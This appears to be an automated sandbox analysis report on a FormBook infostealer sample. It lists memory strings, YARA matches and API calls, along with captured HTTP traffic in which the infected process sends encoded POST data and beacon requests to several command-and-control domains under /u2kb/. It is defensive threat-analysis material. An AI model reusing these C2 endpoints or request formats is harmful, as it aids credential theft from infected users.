          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576758060.000000000C94E000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
          Source: HI4NJ046K.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/domain-registrieren.html
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/e-mail-server.html
          Source: cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
          Source: HI4NJ046K.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/rene
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknownHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
          Source: unknownDNS traffic detected: queries for: www.white-hat.uk
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004103311_2_00410331
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A408B71_2_00A408B7
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A40A3B1_2_00A40A3B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040C0433_2_0040C043
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004058733_2_00405873
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_004018243_2_00401824
